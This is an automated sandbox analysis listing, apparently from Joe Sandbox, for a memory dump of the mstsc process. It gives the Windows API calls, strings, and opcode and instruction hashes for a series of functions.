                                                                                                                                                                                        • Instruction Fuzzy Hash: E471CF31518394AFDB199F6AC948F15BBA6FF4A324F05029AE940CB2B2C770CC41DF81
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000003,009235CA,00000000,00000000,?,009239AA,00000000,00000000,009235CA,00000000,00000000,00000000,00000000,00000000,?), ref: 00923A26
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,009235C6,009235CA,00000000,00000000,?,009239AA,00000000,00000000,009235CA,00000000,00000000,00000000,00000000,00000000,?), ref: 00923A75
                                                                                                                                                                                        • memset.MSVCRT ref: 00923AD0
                                                                                                                                                                                        • wcstol.MSVCRT ref: 00923B4B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocLocal$memsetwcstol
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 389679083-0
                                                                                                                                                                                        • Opcode ID: 5aac8396968394fa6ef12aac62fa79cc3f3162a87463e67b00d6199514c7589b
                                                                                                                                                                                        • Instruction ID: eff494fa93af756b973629dc7fbfb84c025f58e84e5ac6cc923e906a327de26e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aac8396968394fa6ef12aac62fa79cc3f3162a87463e67b00d6199514c7589b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 16412871600316ABDB28DF74EC46B66776DFB44704F08C839E986CB299E639DE00DB90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wcstok_s.MSVCRT ref: 008FFBB3
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 008FFBD8
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$AddressHandleLibraryLocalMessageModuleProcTracewcstok_s
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1445397207-0
                                                                                                                                                                                        • Opcode ID: f8b50dac040f9a6466ea81f11d57ff25af17e80dcac0071a134d82667eaa2b72
                                                                                                                                                                                        • Instruction ID: c1a9d5e3c61261b304eb1c3c774465428bd5cdfe907bdec0603e321407fe68b2
                                                                                                                                                                                        • Opcode Fuzzy Hash: f8b50dac040f9a6466ea81f11d57ff25af17e80dcac0071a134d82667eaa2b72
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3441AC7190021D9BDB249F24DC99BEAB7B9FF44314F1441E6EA09E3151EB309E958F60
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 008F2393
                                                                                                                                                                                        • SendMessageW.USER32(?,?,?,?), ref: 008F23D4
                                                                                                                                                                                        • SetFocus.USER32 ref: 008F23F3
                                                                                                                                                                                        • SendMessageW.USER32(?,00000005,?,00000000), ref: 008F2447
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSend$FocusProcWindow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2656717170-0
                                                                                                                                                                                        • Opcode ID: 467f830503840dcedddb1665c0689074e746c8711068ca77bd3d1cffee3ec030
                                                                                                                                                                                        • Instruction ID: b24159b7c8659855c698e96e916d7c6d1f35512adf843bbec2b9b96bdf9f9946
                                                                                                                                                                                        • Opcode Fuzzy Hash: 467f830503840dcedddb1665c0689074e746c8711068ca77bd3d1cffee3ec030
                                                                                                                                                                                        • Instruction Fuzzy Hash: FB3158B261020EAFDB189FA4C858DBEBB75FF98315B04851CFA06DA174C771E910EB50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008F1050
                                                                                                                                                                                        • memset.MSVCRT ref: 008F107C
                                                                                                                                                                                        • SendMessageW.USER32(?,0000104B,00000000,?), ref: 008F10C3
                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,?), ref: 008F10D5
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSend$lstrcmpimemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1640975521-0
                                                                                                                                                                                        • Opcode ID: 38a5b4d316b5aebd9fd23df268afe83da4780d893d67858e87ad6f67a31efea9
                                                                                                                                                                                        • Instruction ID: ca68a6699df00098b891403b5ba7d70c81051cb01818a4536235cf66f0d059da
                                                                                                                                                                                        • Opcode Fuzzy Hash: 38a5b4d316b5aebd9fd23df268afe83da4780d893d67858e87ad6f67a31efea9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A416171A0121C9BCF259F69CC8CBEABBB5FB44700F144199EA09E7250E6719EC09F91
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00913390: LocalFree.KERNEL32(?,?,008E3402,00000001,008D1B90,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0091339C
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000002,00000000,?,?,?,?,008E3472,00000000,00000001,00000000,00000000,?,00000000,00000000), ref: 009132DC
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeLocal$AddressAllocHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: PTSTR$StringCbCopy failed!$StringCbLength failed!
                                                                                                                                                                                        • API String ID: 139613657-1177650164
                                                                                                                                                                                        • Opcode ID: ae9ddd3241fbf6487529a16f0b8bbc6c580710227ea31a91b11298f4de17c538
                                                                                                                                                                                        • Instruction ID: 9f82b845bb916f080c1697c0a86390e119c4bcb1986e87a53a07e161829b6163
                                                                                                                                                                                        • Opcode Fuzzy Hash: ae9ddd3241fbf6487529a16f0b8bbc6c580710227ea31a91b11298f4de17c538
                                                                                                                                                                                        • Instruction Fuzzy Hash: E3316B31700348ABDB299B99C80DF993BAAFB05310F448195F410DB3A2DE74CE82DB89
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 00921A9A
                                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 00921ABE
                                                                                                                                                                                          • Part of subcall function 00921B44: _CIpow.MSVCRT ref: 00921B67
                                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 00921AF3
                                                                                                                                                                                          • Part of subcall function 00921B44: _CIpow.MSVCRT ref: 00921B8E
                                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 00921B2A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _ftol2_sse$Ipow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3485170201-0
                                                                                                                                                                                        • Opcode ID: 7eaeddc1e629b5481c5988f17276874f08f3687517e660c861dc484995f18036
                                                                                                                                                                                        • Instruction ID: 26f58f06de6d5fcf95b007387a2c6bb0c704875160e9970c56e07c1d72b2823d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7eaeddc1e629b5481c5988f17276874f08f3687517e660c861dc484995f18036
                                                                                                                                                                                        • Instruction Fuzzy Hash: 98314531108B56CBC700EF29E58915ABFF4FF88310F468A89E8D88615DDB31D538CB96
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 0091085C
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • StringCchPrintf failed constructing registry string!, xrefs: 009108EA
                                                                                                                                                                                        • RemoteApplications, xrefs: 009108AF
                                                                                                                                                                                        • %s\%s, xrefs: 009108B4
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryMessageModuleProcTracememset
                                                                                                                                                                                        • String ID: %s\%s$RemoteApplications$StringCchPrintf failed constructing registry string!
                                                                                                                                                                                        • API String ID: 1171831687-3777318425
                                                                                                                                                                                        • Opcode ID: ec1f0ed8f92aea06e38cea5d9ca3f2f1e8a0abff1e1bc9aac47c16c85a2fb55a
                                                                                                                                                                                        • Instruction ID: 040f2e1b51850b00166548a4a5ded2b6cb95c99130dccec61629f5dd59a910cf
                                                                                                                                                                                        • Opcode Fuzzy Hash: ec1f0ed8f92aea06e38cea5d9ca3f2f1e8a0abff1e1bc9aac47c16c85a2fb55a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 362109313483486BEB2E5B489D45F953B56FB45320F140485F548DA2B3C6BBDCD09B92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 009280D3
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0092818E
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed to set memory stream contents!, xrefs: 00928162
                                                                                                                                                                                        • Failed to get the file contents as a string!, xrefs: 0092811F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$??2@AddressHandleLibraryLocalModuleProc
                                                                                                                                                                                        • String ID: Failed to get the file contents as a string!$Failed to set memory stream contents!
                                                                                                                                                                                        • API String ID: 968352646-411829037
                                                                                                                                                                                        • Opcode ID: 7a1f87718de598286fc6f1d6ef1e6081399fac5ccb94cf021bf61bd277127541
                                                                                                                                                                                        • Instruction ID: 4075da2c21f8ffd0350ca9957e9d55b5a8002904c5554c1837c2ba2e07e7c6a9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a1f87718de598286fc6f1d6ef1e6081399fac5ccb94cf021bf61bd277127541
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B21F732605320BBDB198F58E84AFAA7BAAFB45350F080199F500D72E6CF74DD12DB81
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDlgItem.USER32(?,00913133), ref: 00921428
                                                                                                                                                                                        • GetDlgItem.USER32(?,00003381), ref: 00921435
                                                                                                                                                                                        • GetWindowPlacement.USER32(?,?), ref: 00921459
                                                                                                                                                                                        • GetWindowPlacement.USER32(?,?), ref: 00921462
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ItemPlacementWindow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1803133493-0
                                                                                                                                                                                        • Opcode ID: 50cdf94df83304b616a8e7be8f9e5f56977287b52a139dd6b110a86eee8be4cc
                                                                                                                                                                                        • Instruction ID: 70877902fbdf3b4b83734360483f1ee2e7c2fb43590bd431c270d3ecdb082fcb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 50cdf94df83304b616a8e7be8f9e5f56977287b52a139dd6b110a86eee8be4cc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 77217F72E0032CABDF04DFA5DC55AAEBBBAFB48310F00412AF505AB250DB305D11DB90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Menu$EnableItem$InsertSystem
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3907634308-0
                                                                                                                                                                                        • Opcode ID: a25db55ce2b9e20cc11ed06ca559d84f8982e4ed191cef7932536a8b9710014f
                                                                                                                                                                                        • Instruction ID: b24f7f77353d6ceb33916df510ccd8fb7243981c5ef1d79dd317199ef80de571
                                                                                                                                                                                        • Opcode Fuzzy Hash: a25db55ce2b9e20cc11ed06ca559d84f8982e4ed191cef7932536a8b9710014f
                                                                                                                                                                                        • Instruction Fuzzy Hash: D911E635600308BFD7249F55DC8AF7A7BAEEB85710F140059F501AB1E2CBA5EC019B92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: _wcsnicmp$_wcsicmpwcschr
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4194884975-0
                                                                                                                                                                                        • Opcode ID: 56566774b58405b66293b31bd09d30f47e20bc2323e17a30934c502f49b62518
                                                                                                                                                                                        • Instruction ID: afabe772bb700b21c6ba7b7b73978539032d616b75f977ef5a41379983584ad0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 56566774b58405b66293b31bd09d30f47e20bc2323e17a30934c502f49b62518
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A11C4B2209B052BD73C99A99C85FAFBB9CDB80750F18813EF80AC6540EE71DD05CDA0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 008E44D3
                                                                                                                                                                                        • EndDialog.USER32 ref: 008E44E1
                                                                                                                                                                                          • Part of subcall function 00920AA3: EndDialog.USER32 ref: 00920B20
                                                                                                                                                                                        • CheckDlgButton.USER32(?,000033B3,00000002), ref: 008E44FE
                                                                                                                                                                                        • EndDialog.USER32 ref: 008E4512
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Dialog$ButtonCheckFreeLocal
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1027810322-0
                                                                                                                                                                                        • Opcode ID: 547b26aeac7c5de5c0e2057b1b36d3c41d9082744584b2e8176350d7961c0ef8
                                                                                                                                                                                        • Instruction ID: a925157e867d5f6a08c4c65b1aea390048da838660695cb6167dd84ee0287c73
                                                                                                                                                                                        • Opcode Fuzzy Hash: 547b26aeac7c5de5c0e2057b1b36d3c41d9082744584b2e8176350d7961c0ef8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5511C476200B48EBCF215FA6EC49D9A7BA5FB88354F008016FA0EE72A0C731D920DB50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 009218F7
                                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00921901
                                                                                                                                                                                        • timeGetTime.WINMM ref: 00921936
                                                                                                                                                                                        • timeSetEvent.WINMM(00000021,00000000,00921976,00000000,00000101), ref: 0092194E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Windowtime$EventLongRectTime
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3825400517-0
                                                                                                                                                                                        • Opcode ID: 6cd61666643ab9d5aa425834b1bfe489fbc04261dc0d09a21bb2c7e1ff0c74ad
                                                                                                                                                                                        • Instruction ID: 458e65e47744718280e97f993f4f3b0fdf519b9f1dfc4185d938ea46e2c4e0e3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cd61666643ab9d5aa425834b1bfe489fbc04261dc0d09a21bb2c7e1ff0c74ad
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B11A1B6914604DFD720DF65EC09BAAB7F4EB08711F104A1DE58AA76A0D771A800DF54
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 0092B20A
                                                                                                                                                                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0092B23A
                                                                                                                                                                                        • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0092B242
                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0092B24F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 375572348-0
                                                                                                                                                                                        • Opcode ID: f1c662a3b323be0b0eb6488cc284925f17221770580daa1a44b10554a99e398b
                                                                                                                                                                                        • Instruction ID: 0666af10b44e9a680f256853cb788f0f3cdd84c818ab57d0ca7972af8dd2885d
                                                                                                                                                                                        • Opcode Fuzzy Hash: f1c662a3b323be0b0eb6488cc284925f17221770580daa1a44b10554a99e398b
                                                                                                                                                                                        • Instruction Fuzzy Hash: ED0181B1D052287BEB309BA1AC4AFEB7BBCDB49710F000095B909A71C0DA705F549F90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 00913A80
                                                                                                                                                                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,?), ref: 00913AB2
                                                                                                                                                                                        • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,?), ref: 00913ABA
                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00913AC7
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 375572348-0
                                                                                                                                                                                        • Opcode ID: 94bb29fb22fd76e1fae96c1c2f39701fd1ec022076c9aa11938b2e8a133a0a83
                                                                                                                                                                                        • Instruction ID: 1c298102a9aebbaf9da50529618b26989d7554af1d9743cbb1763bef90ada9a8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 94bb29fb22fd76e1fae96c1c2f39701fd1ec022076c9aa11938b2e8a133a0a83
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8901A4B190522C7BEB309B61EC4AFEB7BBCDB49710F400095B909A71C0DAB15F549F90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0090B99D
                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0090B9AD
                                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0090B9C8
                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0090B9CF
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CompatibleCreateDeleteObjectSelect
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3360107340-0
                                                                                                                                                                                        • Opcode ID: 1af2f3a07c9453e0f2f4a0b8e89d5343c47e504e9f98ea4483279f48cae21717
                                                                                                                                                                                        • Instruction ID: 4e508b538025d4d0828fe32076309d4f6edade29ea84fe6a2bb03cbd61e9dc99
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1af2f3a07c9453e0f2f4a0b8e89d5343c47e504e9f98ea4483279f48cae21717
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EE0C9B3119A15BF97121BA6EC08CAB7E2DEB8A7617050121FA0591521CB71D861FBE0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 009051F7
                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(?,-0002E684,?,?), ref: 0090526B
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileNameOpenmemset
                                                                                                                                                                                        • String ID: L
                                                                                                                                                                                        • API String ID: 158052956-2909332022
                                                                                                                                                                                        • Opcode ID: 3f7cc7fd773f5c443031ce20e5d3d4a6fb140dd65ba9bbd4a12ca632e18c92f2
                                                                                                                                                                                        • Instruction ID: be59f15d8fac4d6e4bb498a9401238bfb29dce2b04ae0461117344775ff4935e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f7cc7fd773f5c443031ce20e5d3d4a6fb140dd65ba9bbd4a12ca632e18c92f2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C517CB1A003589FCB28DF64D888B9A77F9FB45300F1505E9E409EB2A1DA75DE84CF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                          • Part of subcall function 008E45D2: _vsnwprintf.MSVCRT ref: 008E4604
                                                                                                                                                                                        • ShellMessageBoxW.SHLWAPI ref: 009354B4
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
